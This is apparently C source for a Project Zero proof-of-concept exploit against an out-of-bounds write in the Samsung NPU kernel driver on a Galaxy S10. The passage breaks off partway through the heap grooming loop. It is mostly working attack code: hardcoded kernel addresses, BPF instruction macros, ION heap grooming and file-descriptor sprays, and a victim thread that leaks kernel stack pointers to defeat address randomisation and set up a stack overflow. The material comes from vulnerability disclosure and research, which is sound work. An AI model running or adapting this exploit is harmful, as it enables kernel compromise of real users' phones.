// Brandon Azad
#if 0
This is a proof-of-concept exploit for Project Zero issue #2073, "Samsung NPU (Neural Processing
Unit) memory corruption in shared memory parsing", reported by Ben Hawkes.

From the initial vulnerability report:

	The first step of this attack is to allocate memory using Android's ION memory allocator
	(e.g. using the ION system heap). The fd for this ION memory mapping can be supplied to the
	VS4L_VERTEXIOC_S_GRAPH ioctl (via vertex_ioctl in
	drivers/vision/vision-core/vision-ioctl.c). Typically this mapping would be used to supply
	convolution neural network feature maps (IFM/OFM). However there is a lack of input
	validation on the "NCP" memory structure that is used to package these feature maps,
	resulting in several out-of-bounds memory accesses and memory corruption.

	Specifically, npu_session_s_graph (drivers/vision/npu/npu-session.c) calls
	__get_session_info to map a view of the userland ION memory buffer in to kernel memory.
	Then npu_session_s_graph will call __config_session_info to parse the untrusted information
	in this memory mapping. This leads to several issues:

	1) Kernel heap corruption can occur due to a "time-of-check, time-of-use" (TOCTOU) bug. The
	size of the temp_IFM_av buffer (and others) is first calculated in __pilot_parsing_ncp by
	looping through the shared memory buffer ncp->memory_vector_cnt times and counting matching
	structure types. The value ncp->memory_vector_cnt comes from the userland shared mapping,
	and can initially be set to a small value.

	Later, in __second_parsing_ncp, the ncp->memory_vector_cnt is read for a second time and
	used for a loop that copies data from the userland shared mapping to the newly allocated
	temp_IFM_av buffer. However, the value of ncp->memory_vector_cnt can be changed by the
	userland application to a larger value (e.g. a race condition exists), resulting in a
	buffer overflow. A proof-of-concept (npu01.c) has been attached that triggers this issue.

	2) In __pilot_parsing_ncp, __second_parsing_ncp, and __ion_alloc_IMB, offset values are
	extracted from the userland shared mapping and used without any bounds checks. For example,
	in __second_parsing_ncp:

	    struct address_vector *av;
	    ...
	    address_vector_offset = ncp->address_vector_offset; /* u32 */
	    ...
	    av = (struct address_vector *)(ncp_vaddr + address_vector_offset);
	    ...
	    case MEMORY_TYPE_WMASK:
	    {
	        // update address vector, m_addr with ncp_alloc_daddr + offset
	        address_vector_index = (mv + i)->address_vector_index;
	        weight_offset = (av + address_vector_index)->m_addr;
	        if (weight_offset > (u32)session->ncp_mem_buf->size) {
	            ret = -EINVAL;
	            ...
	            goto p_err;
	        }
	        (av + address_vector_index)->m_addr = weight_offset + ncp_daddr;

	The assignment operation in the final line can happen out of bounds of the vmap'd kernel
	buffer. It's possible to set the av pointer to other interesting kernel mappings (including
	potentially kernel thread stacks), and to write partially controlled data.

This exploit targets method #2: Since the value ncp->address_vector_offset read from the shared ION
buffer is unchecked, av may point to an arbitrary out-of-bounds address after the ION buffer, and
thus the write to the address_vector element's m_addr field may modify out-of-bounds memory.

The full workings of the exploit are documented in the comments below; see the step-by-step
comments in the function samsung_npu_driver_exploit(). Running this exploit should yield a
preliminary kernel read/write/execute primitive which is demonstrated by dumping kernel memory and
then crashing the device by trying to call an invalid kernel function with controlled arguments.
Subsequent exploitation steps are possible but not demonstrated here.

This exploit has been tested on a rooted Samsung Galaxy S10 SM-G973F running build number
G973FXXS7CTG1, region XSG, kernel 4.14.113-18731944. It can be run from the command line or inside
an Android app, but when run from the command line, it must be run as root. In order to run on a
different device, certain kernel addresses will need to be located (see "Kernel addresses" at the
top of the "Exploit" section).

Compile with:

//	$ android-ndk-r21d/toolchains/llvm/prebuilt/*/bin/clang \
//		-target aarch64-linux-android21 npuselect.c -o npuselect
#endif

#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <pthread.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/user.h>
#include <unistd.h>

//#define ANDROID_APP 1

// ---- drivers/staging/android/uapi/ion.h --------------------------------------------------------

struct ion_allocation_data {
	__u64 len;
	__u32 heap_id_mask;
	__u32 flags;
	__u32 fd;
	__u32 unused;
};

#define ION_IOC_MAGIC		'I'

#define ION_IOC_ALLOC		_IOWR(ION_IOC_MAGIC, 0, \
				      struct ion_allocation_data)

// ---- drivers/vision/include/vs4l.h -------------------------------------------------------------

struct vs4l_graph {
	__u32			id;
	__u32			priority;
	__u32			time; /* in millisecond */
	__u32			flags;
	__u32			size;
	unsigned long		addr;
};

#define VS4L_VERTEXIOC_S_GRAPH			_IOW('V', 0, struct vs4l_graph)

// ---- drivers/vision/npu/drv_usr_if.h -----------------------------------------------------------

struct drv_usr_share {
	unsigned int id;
	int ncp_fd;
	unsigned int ncp_size;
	unsigned long ncp_mmap;
};

// ---- drivers/vision/npu/ncp_header.h -----------------------------------------------------------

typedef __u32 u32;

enum ncp_memory_type {
	MEMORY_TYPE_IN_FMAP, /* input feature map */
	MEMORY_TYPE_OT_FMAP, /* output feature map */
	MEMORY_TYPE_IM_FMAP, /* intermediate feature map */
	MEMORY_TYPE_OT_PIX0,
	MEMORY_TYPE_OT_PIX1,
	MEMORY_TYPE_OT_PIX2,
	MEMORY_TYPE_OT_PIX3,
	MEMORY_TYPE_WEIGHT,
	MEMORY_TYPE_WMASK,
	MEMORY_TYPE_LUT,
	MEMORY_TYPE_NCP,
	MEMORY_TYPE_GOLDEN,
	MEMORY_TYPE_CUCODE,
	MEMORY_TYPE_MAX
};

struct memory_vector {
	u32 	type;
	u32 	pixel_format;
	u32 	width;
	u32 	height;
	u32 	stride;
	u32 	channels;
	u32 	cstride;
	u32 	address_vector_index;
};

struct ncp_header {
	u32 	magic_number1;
	u32 	hdr_version;
	u32 	hdr_size;
	u32 	intrinsic_version;
	u32 	net_id;
	u32 	unique_id;
	u32 	priority;
	u32 	flags;
	u32 	period;
	u32 	workload;
	u32 	address_vector_offset;
	u32 	address_vector_cnt;
	u32 	memory_vector_offset;
	u32 	memory_vector_cnt;
	u32 	chunk_vector_offset;
	u32 	chunk_vector_cnt;
	u32 	group_vector_offset;
	u32 	group_vector_cnt;
	u32 	body_version;
	u32 	body_offset;
	u32 	body_size;
	u32	blob_vector_offset;
	u32	blob_vector_cnt;
	u32	reserved[10];
	u32 	magic_number2;
};

// ---- drivers/vision/npu/ncp_header.h -----------------------------------------------------------

#define BPF_ALU64_REG(OP, DST, SRC)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_OP(OP) | BPF_X,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

#define BPF_ALU64_IMM(OP, DST, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,	\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

#define BPF_MOV64_REG(DST, SRC)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_MOV | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

#define BPF_MOV64_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_MOV | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

#define BPF_LD_IMM64(DST, IMM)					\
	BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_LD | BPF_DW | BPF_IMM,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = (__u32) (IMM) }),			\
	((struct bpf_insn) {					\
		.code  = 0, /* zero is reserved opcode */	\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = ((__u64) (IMM)) >> 32 })

#define BPF_MOV64_RAW(TYPE, DST, SRC, IMM)			\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_MOV | BPF_SRC(TYPE),	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = IMM })

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

#define BPF_STX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

#define BPF_STX_XADD(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_STX | BPF_SIZE(SIZE) | BPF_XADD,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

#define BPF_ST_MEM(SIZE, DST, OFF, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = IMM })

#define BPF_JMP_REG(OP, DST, SRC, OFF)				\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_OP(OP) | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

#define BPF_JMP_IMM(OP, DST, IMM, OFF)				\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_OP(OP) | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = IMM })

#define BPF_JMP_A(OFF)						\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_JA,			\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = 0 })

// This check has been added to ensure that function calls are always within the allowed range.
#define BPF_EMIT_CALL__IMM(FUNC)	({			\
		uintptr_t __offset = (FUNC) - __bpf_call_base;	\
		if ((__s32) __offset != __offset) {		\
			FATAL("Function call 0x%lx out of range",\
					(uintptr_t) (FUNC));	\
		}						\
		(__s32) __offset;				\
	})

#define BPF_EMIT_CALL(FUNC)					\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_CALL,			\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = BPF_EMIT_CALL__IMM(FUNC)/*((FUNC) - __bpf_call_base)*/ })

#define BPF_EXIT_INSN()						\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_EXIT,			\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = 0 })

// ---- Logging -----------------------------------------------------------------------------------

#define LOG(fmt, ...)	do { log_msg(fmt "\n", ##__VA_ARGS__); } while (0)
#define ABORT()		do { for (;;) { sleep(1); }; exit(1); } while (0)
#define FATAL(fmt, ...)	do { LOG(fmt, ##__VA_ARGS__); ABORT(); } while (0)

#if ANDROID_APP
#define ANDROID_LOGGING 1
#endif

#if ANDROID_LOGGING

#include <android/log.h>

static void log_msg(const char *fmt, ...) {
	char buf[1024];
	va_list ap;
	va_start(ap, fmt);
	__android_log_vprint(ANDROID_LOG_FATAL, "exploit", fmt, ap);
	va_end(ap);
}

#else

static int log_fd = STDERR_FILENO;

static void log_msg(const char *fmt, ...) {
	char buf[1024];
	va_list ap;
	va_start(ap, fmt);
	int len = vsnprintf(buf, sizeof(buf), fmt, ap);
	va_end(ap);
	if (len > 0) {
		write(log_fd, buf, len);
	}
}

#endif

// ---- Debugging ---------------------------------------------------------------------------------

//#define VMALLOC_DEBUG 1

#if VMALLOC_DEBUG
#define VMALLOC_CHECKPOINT(n)	vmalloc_checkpoint(n)
#else
#define VMALLOC_CHECKPOINT(n)	do { } while (0)
#endif

#if VMALLOC_DEBUG

static void disable_kptr_restrict() {
	static bool disabled = false;
	if (!disabled) {
		int fd = open("/proc/sys/kernel/kptr_restrict", O_WRONLY);
		write(fd, "0\n", 2);
		close(fd);
		disabled = true;
	}
}

static void vmalloc_checkpoint(int n) {
	disable_kptr_restrict();
	char buf[0x4000];
	int in_fd = open("/proc/vmallocinfo", O_RDONLY);
	if (in_fd >= 0) {
		char name[32];
		snprintf(name, sizeof(name), "vm%u.txt", n);
		int out_fd = open(name, O_CREAT | O_RDWR | O_TRUNC);
		if (out_fd >= 0) {
			for (;;) {
				ssize_t cnt = read(in_fd, buf, sizeof(buf));
				if (cnt <= 0) {
					break;
				}
				write(out_fd, buf, cnt);
			}
			close(out_fd);
			sync();
		}
		close(in_fd);
	}
}

#endif	// VMALLOC_DEBUG

// ---- File descriptor array ---------------------------------------------------------------------

struct fd_array {
	int *owned;
	int *fd;
	size_t count;
};

struct fd_array create_fd_array(size_t count, int (*create_fd)(void)) {
	assert((uint32_t) count == (size_t) count);
	int *fds = malloc(count * sizeof(*fds));
	for (size_t i = 0; i < count; i++) {
		if (create_fd != NULL) {
			fds[i] = create_fd();
		} else {
			fds[i] = -1;
		}
	}
	return (struct fd_array) { .owned = fds, .fd = fds, .count = (uint32_t) count };
}

void destroy_fd_array(struct fd_array fds, void (*destroy_fd)(int)) {
	for (size_t i = 0; i < fds.count; i++) {
		if (destroy_fd != NULL && fds.fd[i] >= 0) {
			destroy_fd(fds.fd[i]);
		}
		fds.fd[i] = -1;
	}
	if (fds.owned) {
		free(fds.owned);
	}
}

struct fd_array pop_fds(struct fd_array *fds, size_t n) {
	assert(n <= fds->count);
	struct fd_array pop = { .owned = NULL, .fd = fds->fd, .count = n };
	fds->fd += n;
	fds->count -= n;
	return pop;
}

// ---- Exploit -----------------------------------------------------------------------------------

// Kernel addresses.
static const uint64_t current_time     = 0xFFFFFF8008293D28;
static const uint64_t GADGET_LOAD_X1   = current_time + 0x3C;
static const uint64_t __bpf_prog_run32 = 0xFFFFFF80081BF1A0;
static const uint64_t __bpf_call_base  = 0xFFFFFF80081BD9F8;
#if ANDROID_APP
static const uint64_t leaked_stackptr_offset = 0x38;
static const uint64_t leaked_retaddr_offset  = 0x40;
static const uint64_t leaked_retaddr   = __bpf_prog_run32 + 0x34;
#else
static const uint64_t leaked_stackptr_offset = 0x38;
static const uint64_t leaked_retaddr_offset  = 0x40;
static const uint64_t sock_write_iter  = 0xFFFFFF8008E79424;
static const uint64_t leaked_retaddr   = sock_write_iter + 0xC4;
#endif

#if ANDROID_APP
#define START_FD	64
#else
#define START_FD	0
#endif

static void pipe_chk(int pipe_fds[static 2]) {
	int ret = pipe(pipe_fds);
	if (ret < 0) {
		perror("pipe");
		FATAL("Could not create pipe");
	}
}

static int dup_chk(int fd) {
	int fd2 = dup(fd);
	if (fd2 < 0) {
		perror("dup");
		FATAL("Could not dup fd %d", fd);
	}
	return fd2;
}

static void dup2_chk(int old_fd, int new_fd) {
	int ret = dup2(old_fd, new_fd);
	if (ret < 0) {
		perror("dup2");
		FATAL("Could not dup2 fd %d to %d", old_fd, new_fd);
	}
}

static int ion_open() {
	int fd = open("/dev/ion", O_RDONLY | O_CLOEXEC);
	if (fd < 0) {
		perror("open(/dev/ion)");
		FATAL("Could not open /dev/ion");
	}
	return fd;
}

static int ion_alloc(int ion_fd, size_t size, unsigned heap) {
	struct ion_allocation_data alloc = { .len = size, .heap_id_mask = 1 << heap };
	int ret = ioctl(ion_fd, ION_IOC_ALLOC, &alloc);
	if (ret < 0) {
		perror("ioctl(ION_IOC_ALLOC)");
		FATAL("Could not allocate ION buffer");
	}
	return alloc.fd;
}

static void *ion_mmap(int ion_alloc_fd, size_t size) {
	void *map = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, ion_alloc_fd, 0);
	if (map == MAP_FAILED) {
		perror("mmap(/dev/ion)");
		FATAL("Could not mmap ION buffer");
	}
	return map;
}

static int binder_open() {
	int fd = open("/dev/binder", O_RDONLY | O_CLOEXEC);
	if (fd < 0) {
		perror("open(/dev/binder)");
		FATAL("Could not open /dev/binder");
	}
	return fd;
}

static void *binder_mmap(int fd, size_t size) {
	void *map = mmap(NULL, size, PROT_READ, MAP_PRIVATE, fd, 0);
	if (map == MAP_FAILED) {
		perror("mmap(/dev/binder)");
		FATAL("Could not mmap /dev/binder");
	}
	return map;
}

static int vertex10_open() {
	int ncp_fd = open("/dev/vertex10", O_RDONLY | O_CLOEXEC);
	if (ncp_fd < 0) {
		perror("open(/dev/vertex10)");
		FATAL("Could not open /dev/vertex10");
	}
	return ncp_fd;
}

static void vertex10_set_daddr_write_offset(void *ion_map, uint32_t daddr_write_offset) {
	// Set up the NCP header with a single memory vector. address_vector_offset
	// will be used to conduct the out-of-bounds write.
	struct ncp_header *ncp = ion_map;
	ncp->memory_vector_cnt     = 1;
	ncp->memory_vector_offset  = sizeof(*ncp);
	ncp->intrinsic_version     = 0x41414141;
	ncp->address_vector_offset = daddr_write_offset - 4;
	// Initialize the single memory vector of type MEMORY_TYPE_WEIGHT.
	struct memory_vector *mv = (struct memory_vector *) (ncp + 1);
	mv->type                 = MEMORY_TYPE_WEIGHT;
	mv->address_vector_index = 0;
}

static void vertex10_add_daddr(int ncp_fd, int ion_alloc_fd, size_t ion_size) {
	// Call the VS4L_VERTEXIOC_S_GRAPH ioctl, which will reach the vulnerable function
	// __second_parsing_ncp() to perform the addition of the ION buffer's device address to an
	// out-of-bounds 32-bit integer (assuming the initial value was less than the daddr
	// itself). Unfortunately, calling this multiple times will render the ION buffer unable to
	// be deallocated/reallocated.
	struct drv_usr_share usr_share = { .ncp_fd = ion_alloc_fd, .ncp_size = ion_size };
	struct vs4l_graph vs4l_graph = { .addr = (uintptr_t) &usr_share };
	ioctl(ncp_fd, VS4L_VERTEXIOC_S_GRAPH, &vs4l_graph);
}

static uint32_t vertex10_get_ion_daddr(int ion_alloc_fd, void *ion_map, size_t ion_size) {
	// For convenience, we can mmap the ION buffer for the caller. This shouldn't be used on a
	// timing-critical path.
	void *unmap_ion = NULL;
	if (ion_map == NULL) {
		unmap_ion = ion_mmap(ion_alloc_fd, ion_size);
		ion_map = unmap_ion;
	}

	// Open the NPU device, /dev/vertex10. This one is just for testing the address: We want to
	// be sure that the daddr is acceptable, but allow the ION buffer to be unmapped from the
	// kernel cleanly. Since this appears to happen on close, we'll just open, test, close.
	int ncp_fd = vertex10_open();

	// Tell the NPU driver to map the ION fd and initialize the NCP header.
	vertex10_set_daddr_write_offset(ion_map, 0x800);
	uint32_t *ion_daddr_ptr = (uint32_t *) ((uintptr_t) ion_map + 0x800);
	vertex10_add_daddr(ncp_fd, ion_alloc_fd, ion_size);

	// Close the NPU driver fd to clean up state.
	close(ncp_fd);

	// Check the ION buffer's device address. Reset the value to 0 in case we do subsequent
	// writes.
	uint32_t ion_daddr = *ion_daddr_ptr;
	*ion_daddr_ptr = 0;

	// If we mmapped the ION buffer, unmap it.
	if (unmap_ion != NULL) {
		munmap(unmap_ion, ion_size);
	}

	return ion_daddr;
}

// The number of threads currently running.
static _Atomic size_t thread_count = 0;

// The victim thread's TID.
static int victim_tid = 0;

// The stack address of the victim thread.
static uint64_t victim_stack = 0;

// The kernel slide computed from the leaked return address.
static uint64_t kernel_slide = 0;

// The buffer on which the victim thread should call pselect6() to perform the kernel stack buffer
// overflow, and the value of n.
static void *pselect6_input;
static int pselect6_n;

// Invoke the pselect6() syscall to test whether this is the victim thread.
#define VICTIM_TEST_REGISTER	16
extern uint64_t __pselect6_test(int n, fd_set *inp, fd_set *outp, fd_set *exp,
		struct timespec *ts, void *sig);
asm(
		".text\n"
		".globl __pselect6_test\n"
		"__pselect6_test:"
		"	mov x16, #0\n"
		"	mov x8, #72\n"
		"	svc #0\n"
		"	mov x0, x16\n"
		"	ret\n"
);

// Invoke the pselect6() syscall, returning normally.
extern int __pselect6(int n, fd_set *inp, fd_set *outp, fd_set *exp,
		struct timespec *ts, void *sig);
asm(
		".text\n"
		".globl __pselect6\n"
		"__pselect6:"
		"	mov x8, #72\n"
		"	svc #0\n"
		"	ret\n"
);

// Check whether a value looks like a kernel pointer.
static bool looks_like_kernel_pointer(uint64_t x) {
	return ((((x) >> 32) & 0xffffff00) == 0xffffff00);
}

// The victim thread.
static void *victim_thread_func(void *arg) {
	// Alert the main exploit thread that we are running.
	thread_count++;

	// 10. Call pselect6() to try and read from the pipe. This will block until after the main
	// exploit thread has corrupted the saved pt_regs->x16. The return value of __pselect6_test
	// is the value of X16, allowing us to check whether this thread is the victim.
	int zero_rpipe = START_FD;	// See step 1.
	fd_set rfds;
	FD_ZERO(&rfds);
	FD_SET(zero_rpipe, &rfds);
	int nfd = zero_rpipe + 1;
	uint64_t test_value = __pselect6_test(nfd, &rfds, NULL, NULL, NULL, NULL);

	// 14. After the return from pselect6(), check X16 to see if it has been modified. If X16
	// is nonzero, then this is the victim thread. Otherwise, this is not the victim thread,
	// and we can exit. Storing the victim_tid will alert the main exploit thread to continue.
	if (test_value == 0) {
		thread_count--;
		return NULL;
	}
	victim_tid = gettid();

	// 16. The next step is to leak uninitialized kernel stack memory using pselect6(). We will
	// block in pselect6() with n = 0, and then from the main exploit thread, we will modify
	// the value of register X22 in core_sys_select() where it's spilled to the stack by
	// do_select() from 0 to 0x8X (the top byte of ION 2's daddr), thereby increasing the
	// amount of memory that's copied out. This also corrupts the spilled value of X23, but
	// this should be fine, as the corrupted value is not used after do_select() returns.
	// However, X23 unavoidably holds a kernel pointer when the callee-saved registers get
	// spilled, which means that the saved X23 starts with 0xffffff...; this forces us to use
	// an ION buffer size of at least 0x01000000 (16 MiB), or else we would fail the check that
	// the initial value is less than the ION buffer size.
	//
	// We will use a write to a socket to pre-populate the stack_fds buffer content with useful
	// data.
	int sockpair[2];
	int ret = socketpair(AF_UNIX, SOCK_STREAM, 0, sockpair);
	if (ret != 0) {
		perror("socketpair");
		FATAL("Could not create socket pair");
	}
	uint8_t buf[0x100];
	memset(buf, 0xbb, sizeof(buf));
	write(sockpair[0], buf, sizeof(buf));
	struct timespec ts = { .tv_sec = 2 };
	__pselect6(0, (fd_set *) buf, NULL, NULL, &ts, NULL);
	close(sockpair[0]);
	close(sockpair[1]);

	// 18. After pselect6() returns, the buffer should contain a copy of uninitialized kernel
	// stack data. Observationally, there is a pointer to the stack itself at offset 0x38 and a
	// return address at offset 0x40.
	uint64_t stackptr = *(uint64_t *) (buf + leaked_stackptr_offset);
	uint64_t retaddr  = *(uint64_t *) (buf + leaked_retaddr_offset);
	LOG("Leaked 0x%lx, 0x%lx", stackptr, retaddr);
	if (!looks_like_kernel_pointer(stackptr) || !looks_like_kernel_pointer(retaddr)) {
		LOG("Invalid leaked stackptr 0x%lx or retaddr 0x%lx", stackptr, retaddr);
		FATAL("Could not leak uninitialized kernel stack");
	}
	kernel_slide = retaddr - leaked_retaddr;
	if ((kernel_slide & 0xfff) != 0) {
		LOG("Leaked return address 0x%lx is not slid from 0x%lx", retaddr, leaked_retaddr);
		FATAL("Failed to find kernel text base");
	}
	__builtin_arm_dsb(15);	// Make other writes visible first.
	victim_stack = (stackptr + 0x1000 - 1) & ~(0x1000 - 1);

	// 23. Once the main exploit thread gives us the parameters, call pselect6() one final time
	// to trigger the stack buffer overflow.
	while (pselect6_input == NULL) {
		usleep(10 * 1000);
	}
	uint64_t *input = pselect6_input;
	pselect6_input = NULL;
	int n = pselect6_n;
	size_t longs = (n + 63) / 64;
	pselect6_n = 0;
	uint64_t *rfd = input + 0 * longs;
	uint64_t *wfd = input + 1 * longs;
	uint64_t *efd = input + 2 * longs;
	ret = __pselect6(n, (fd_set *) rfd, (fd_set *) wfd, (fd_set *) efd, NULL, NULL);
	LOG("Kernel stack buffer overflow pselect6() returned %d", ret);

	LOG("Victim exiting...");
	return NULL;
}

void samsung_npu_driver_exploit() {
	LOG("Samsung NPU driver exploit");

	VMALLOC_CHECKPOINT(1);

	// 1. Create 2 pipes, zero_pipe and one_pipe, and make the first 0x1140 file descriptors
	// (fds 0-0x113f) dup's of the read end of the zero_pipe. This will be used much later in
	// the exploit.
	//
	// If ANDROID_APP is defined, then this is running in an Android app, and so we will leave
	// the first 64 file descriptors intact (which shouldn't affect the exploit).
	const unsigned corrupted_n = 0x1140;
	int zero_pipe[2];
	int one_pipe[2];
	// First spray 0x1140 copies of /dev/null to consume all fds < 0x1140. TODO: Spray extra
	// and dup2() rather than dup().
	int *null_fds = malloc(corrupted_n * sizeof(*null_fds));
	null_fds[0] = open("/dev/null", O_RDONLY | O_CLOEXEC);
	for (unsigned i = 1; i < corrupted_n; i++) {
		null_fds[i] = dup_chk(null_fds[0]);
	}
	// Now create our pipes. These should be assigned fds >= 0x1140.
	pipe_chk(zero_pipe);
	pipe_chk(one_pipe);
	assert(zero_pipe[0] >= corrupted_n && zero_pipe[1] >= corrupted_n);
	assert(one_pipe[0] >= corrupted_n && one_pipe[1] >= corrupted_n);
	// Also dup any file descriptors we'll need to keep alive above 0x1140.
#if !ANDROID_APP
	log_fd = dup_chk(log_fd);
	assert(log_fd >= corrupted_n);
#endif
	// Now dup2 the read end of the zero_pipe over all fds 0-0x113f.
	for (unsigned fd = START_FD; fd < corrupted_n; fd++) {
		dup2_chk(zero_pipe[0], fd);
	}
	// Close the /dev/null fds that weren't closed by dup2().
	for (unsigned i = 0; i < corrupted_n; i++) {
		if (null_fds[i] >= corrupted_n) {
			close(null_fds[i]);
		}
	}
	free(null_fds);

	// 2. Try to get 2 ION buffers allocated with suitable device addresses and sizes.
	//
	// We need the ION buffer pair to meet one of the following size/address constraints (not
	// an exhaustive list):
	//
	// 	 0x00001000   0x01000000   CONSTRAINTS         ADDITIONS        SUM (32-bit)
	// 	------------+------------+-------------------+----------------+--------------
	// 	 0x8qr01000 : 0x8w7yz000 : q+y=0xf, r+z=0x10 : L@0, B@1       : 0x1000
	// 	 0x8q001000 : 0x8w7y0000 : q+y=0x10          : L@0, B@1       : 0x1000
	// 	 0x8q009000 : 0x8f7y7000 : q+y=0xf           : L@0, B@-1, B@1 :  0xy70
	//
	// These constraints make it possible to use the out-of-bounds addition primitive in a more
	// controlled way. The raw primitive adds the device address of the ION buffer at an
	// arbitrary (possibly unaligned) offset from its start, so long as the original value at
	// that location is less than the ION buffer size. This in and of itself is very powerful,
	// but ION device addresses are typically of the form 0x8XXXX000, which means we can't
	// exert fine control over the resulting value with just a single addition.
	//
	// For the exploit strategy used here, we'll need to use the add primitive to increment a
	// 32-bit integer n from 0x140 to some value between 0x600 and 0x11c0. That, plus the
	// requirement that one of the ION buffers has size at least 0x01000000, gives rise to the
	// address constraints above. For example, by adding 0x8qr01000 at offset 0 and then
	// 0x8w7yz000 at offset 1, we end up increasing the value of n to 0x1140.
	//
	// How do we get ION buffers of the required sizes allocated at the specified device
	// addresses? We can take advantage of the rather deterministic allocation pattern of the
	// ION heap allocators, and in particular that for ION heap 5. This ION heap typically
	// allocates daddrs from low to high and usually inserts padding between allocations of
	// size exactly 0x00100000. Thus, given an ION allocation's size and daddr, we can usually
	// predict the daddr of the subsequent allocation.
	//
	// For the purposes of this POC, I'm simply hardcoding the ION addresses I want to allocate
	// as 0x81801000 (size 0x1000, but bumped to 0x8000 for vmalloc heap grooming) and
	// 0x827e8000 (size 0x1000000). To allocate these addresses, we'll spray small ION buffers
	// until we get within range (semi-arbitrarily taken as 4 padding widths). Once we're close
	// enough, we repeatedly try to allocate a "filler" ION buffer of exactly the right size
	// such that the allocation and padding line up the subsequent ION allocation to hit our
	// target address.
	const uint32_t ION1_DADDR  = 0x81801000;
	const uint32_t ION1_SIZE   = 0x00008000;	// Size must be > 0x4000 for vmalloc shaping.
	const unsigned ION1_OFFSET = 0;
	const uint32_t ION2_DADDR  = 0x827e8000;
	const uint32_t ION2_SIZE   = 0x01000000;
	const unsigned ION2_OFFSET = 1;
	const unsigned ion_heap = 5;
	assert((uint32_t) (0x140 + ION1_DADDR + (ION2_DADDR << 8)) == corrupted_n);
	// Open the main ION handle.
	int ion_fd = ion_open();
	// Describe the allocation parameters.
	uint32_t ion_padding = 0x00100000;
	uint32_t min_ion_alloc = 0x1000;
	struct target_ion_alloc {
		uint32_t daddr; uint32_t size; int fd;
	} target_ion_alloc[2] = {
		{ ION1_DADDR, ION1_SIZE },
		{ ION2_DADDR, ION2_SIZE },
	};
	const struct target_ion_alloc *end_of_targets = &target_ion_alloc[2];
	// Create an array of fds for the ION allocations.
	struct fd_array ion_fill_fds = create_fd_array(8192, NULL);
	unsigned fd_idx = 0;
	// Snapshot the expected daddr to be allocated, but don't persist it. This simplifies the
	// loop below.
	int tmp_fd = ion_alloc(ion_fd, min_ion_alloc, ion_heap);
	uint32_t expected_daddr = vertex10_get_ion_daddr(tmp_fd, NULL, min_ion_alloc);
	close(tmp_fd);
	// Allocate each of the target ION buffers in turn.
	struct target_ion_alloc *target = target_ion_alloc;
	for (; target < end_of_targets; target++) {
		// First we spray small ION buffers to get close to the target (within 4 ION
		// padding lengths). To increase heap stability, we will retry allocations that
		// don't progress linearly.
		const uint32_t direct_fill_threshold = 4 * ion_padding;
		unsigned retry_count = 0;
		const unsigned max_retries = 2;
		for (;;) {
			// Allocate a minimally-sized space-filling ION buffer.
			uint32_t fill_size = min_ion_alloc;
			int fill_fd = ion_alloc(ion_fd, fill_size, ion_heap);
			uint32_t daddr = vertex10_get_ion_daddr(fill_fd, NULL, fill_size);
			// Check if we should retry the allocation.
			uint32_t next_daddr = daddr + fill_size + ion_padding;
			if (daddr != expected_daddr) {
				// Handle the case that we've still got retries left.
				if (retry_count < max_retries) {
					retry_count++;
					close(fill_fd);
					//LOG("ION 0x%08x [%x] != 0x%08x; retry", daddr, fill_size,
					//		expected_daddr);
					continue;
				}
				// Out of retries. Just continue with this address.
				//LOG("ION 0x%08x [%x] != 0x%08x; next = 0x%08x  (%u)", daddr,
				//		fill_size, expected_daddr, next_daddr, fd_idx);
			} else {
				// Got the expected address.
